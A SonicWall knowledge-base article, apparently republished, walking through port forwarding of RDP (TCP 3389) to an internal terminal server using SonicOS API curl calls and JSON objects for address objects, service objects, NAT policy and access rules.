TLP:GREEN : C=79, M=0, Y=100, K=0, background: C=0, M=0, Y=0, K=100
TLP:WHITE : C=0, M=0, Y=0, K=0, background: C=0, M=0, Y=0, K=100

Source :
https://www.cisa.gov/tlp

Port Forwarding configured using SonicOS API

Description

This article describes the steps involved in creating Polices using SonicOS APIs that will let you access internal devices or servers behind the SonicWall firewall.

Cause

SonicWall by default does not allow inbound traffic which not a part of a session that was initiated by an internal device on the network. This is done to protect the devices in the internal network from malicious access. If required certain parts of the network can be opened to external access, for example Webservers, Exchange servers and so on.

To open the network, we need to specify an access rule from the external network to the internal network and a NAT Policy so we direct traffic only to the intended device.

With APIs this can be achieved on scale for example you can create multiple Access Rules and NAT policies with one command and all the attributes can be specified into Json Objects.

Resolution

Manually opening Ports / enabling Port forwarding to allow traffic from the Internet to a Server behind the SonicWall using sonicos API involves the following steps:

Step1: Enabling the API Module.

Step2:Getting into Swagger.

Step3:Login to the SonicWall with API.

Step4:Create Address Objects and Service Objects with API.

Step5:Creating NAT Policy with API.

Step6: Creating Access Rules with API.

Step7:Committing all the configurational changes made with APIs.

Step8: Log out the SonicWall with API:

Scenario Overview

The following walk-through details allowing TCP 3389 From the Internet to a Terminal Server on the Local Network.Once the configuration is complete, Internet Users can RDP into the Terminal Server using the WAN IP address.Although the examples below show the LAN Zone and TCP 3389 they can apply to any Zone and any Port that is required.

Step 1: Enabling the API Module:               
 

  1.  Log into the SonicWall GUI.
  2.  Click Manage in the top navigation menu.
  3. Click Appliance | Base Settings
  4. Under Base Settings search for sonicos API
  5. Click Enable sonicos API  
  6. Click Enable RFC-2617 HTTP Basic Access authentication
Enabling API on the SonicOS

Step2: Getting into Swagger

  1. Click on the Mange Tab
  2. Scroll Down to find API
  3. Click on the Link https://sonicos-api.sonicwall.com
  4. Swagger will prepopulate your SonicWalls’s IP, MGMT Port, Firmware so it can give you a list of applicable APIs.

 NOTE: All the APIs required for configuring Port Forwarding will be listed in this Article.

API on the SonicOS

Step3:Login to the SonicWall with API:

  1.  curl -k -i -u “admin:password” -X POST https://192.168.168.168:443/api/sonicos/auth

      “admin:password” – Replace this with your SonicWalls username : password

      https://192.168.168.168:443/– Replace this with your SonicWalls Public or private IP address

Command Output should contain a string: “success”: true

Login with API

 NOTE: You are free to choose Swagger, Postman, Git bash or any application that allows API calls, if you are using a Linux based operating system you can execute cURL from the terminal.For this article I am using Git bash on Windows.

Step4:Create Address Objects and Service Objects with API:

  1.   curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/address-objects/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d “{\”address_object\”:{\”ipv4\”:{\”name\”:\”Term Server Private\”,\”zone\”:\”LAN\”,\”host\”:{\”ip\”:\”192.168.168.10\”}}}}”  &&  curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/address-objects/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d “{\”address_object\”:{\”ipv4\”:{\”name\”:\”Term Server Public\”,\”zone\”:\”WAN\”,\”host\”:{\”ip\”:\”1.1.1.1\”}}}}”

 OR 

curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/address-objects/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d @add.Json

@add.Json is a file with the following information:

{
“address_objects”: [
{
“ipv4”: {
“name”: “Term Server Private”,
“zone”: “LAN”,
“host”: {
“ip”: “192.168.168.10”
}
}
},
{
“ipv4”: {
“name”: “Term Server Public”,
“zone”: “WAN”,
“host”: {
“ip”: “1.1.1.1”
}
}
}
]
}

Output of the First command where we have parsed the address object data on the command instead of creating a separate File:

Image

 Output of the second Command where we have used a file called @add instead of specifying data on the command:

Image

 TIP: If you are creating only one Address Object then the First command should be sufficient, if you are creating multiple address objects then the second command should be used.

 CAUTION: I have the add.Json file saved on to my desktop and hence I was able to call it into the command, if you have created the Json the file in a different location then make sure you are executing the command from that location.

2. Adding Service Object:

 curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/service-objects” -H “accept: application/Json” -H “Content-Type: application/Json” -d @serviceobj.Json

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

@serviceobj.Json is a file that contains the Attributes of the service object:

{

  “service_object”: {

    “name”: “Terminal Server 3389”,

    “TCP”: {

      “begin”: 3389,

      “end”: 3389

    }

  }

}

Output of the command:

Image

 3. Committing the changes made to the SonicWall: We need to do this to be able to use the Address Objects and service objects that we just created to make a NAT Policy and an Access Rule.

  curl -k -X POST “https://192.168.168.168:443/api/sonicos/config/pending” -H “accept: application/Json”

  https://192.168.168.168:443 – Replace that with the IP of the SonicWall

Output of the command: 

Image

Step5: Creating NAT Policy with API:

1.     curl -k -i -X POST “https://192.168.168.168:443/api/sonicos/nat-policies/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d @natpolicy.Json

         https://192.168.168.168:443 – Replace that with the IP of the SonicWall

         @natpolicy.Json is a file that contains the Attributes of the NAT Policy:

{

  “nat_policies”: [

    {

      “ipv4”: {

        “name”: “Inbound NAT 3389”,

        “enable”: true,

        “comment”: “”,

        “inbound”: “X1”,

        “outbound”: “any”,

        “source”: {

          “any”: true

        },

        “translated_source”: {

          “original”: true

        },

        “destination”: {

          “name”: “Term Server Public”

        },

        “translated_destination”: {

          “name”: “Term Server Private”

        },

        “service”: {

          “name”: “Terminal Server 3389”

        },

        “translated_service”: {

          “original”: true

        }

      }

    }

  ]

}

Output of the command:

Image

Step6: Creating Access Rules with API:

1.     curl -k -X POST “https://192.168.168.168:443/api/sonicos/access-rules/ipv4” -H “accept: application/Json” -H “Content-Type: application/Json” -d @accessrule.Json

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

@accessrule.Json is a file that contains the Attributes of the access rule:

{

  “access_rules”: [

    {

      “ipv4”: {

        “name”: “Inbound 3389”,

        “enable”: true,

        “from”: “WAN”,

        “to”: “LAN”,

        “action”: “allow”,

        “source”: {

          “address”: {

            “any”: true

          },

          “port”: {

            “any”: true

          }

        },

        “service”: {

          “name”: “Terminal Server 3389”

        },

        “destination”: {

          “address”: {

            “name”: “Term Server Public”

          }

        }

        }

    }

  ]

}

Output of the command:

Image

Step7: Committing all the configurational changes made with APIs:

1.     We have already committed Address objects and Service Objects in Step 4, In this step we are committing the NAT Policy and the Access Rule to the SonicWalls configuration:

curl -k -X POST “https://192.168.168.168:443/api/sonicos/config/pending” -H “accept: application/Json”

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

We have Only used the POST method in most of the API calls for this Article because we are only Adding things into the configuration, there are other methods Like GET,DELETE,PUT and etc. I recommend that you go through https://sonicos-api.sonicwall.com for more API commands.

Step8: Log out the SonicWall with API:

1.       It is recommended to log out from the SonicWall via API once the desired configuration is committed.

         curl -k -i -u “admin:password” -X DELETE https://192.168.168.168:443/api/sonicos/auth

         https://192.168.168.168:443 – Replace that with the IP of the SonicWall

         “admin:password” – is the actual username and password for the SonicWall.

Output of the command:

Image

 CAUTION: Caution: If you miss to perform the action in Step 7 and Execute the command in Step 8 you will lose all the configuration changes made in the current session.

Summary:We have successfully configured a Port Forwarding for a user in the Internet to access a Term Server that is behind a Firewall on port 3389 using sonicos API.

 NOTE: It is always recommended to use Client VPN for RDP connections this article here is just an example.

Related Articles

Categories

Source :
https://www.sonicwall.com/support/knowledge-base/port-forwarding-with-sonicos-api-using-postman-and-curl/190224162643523/

Exit mobile version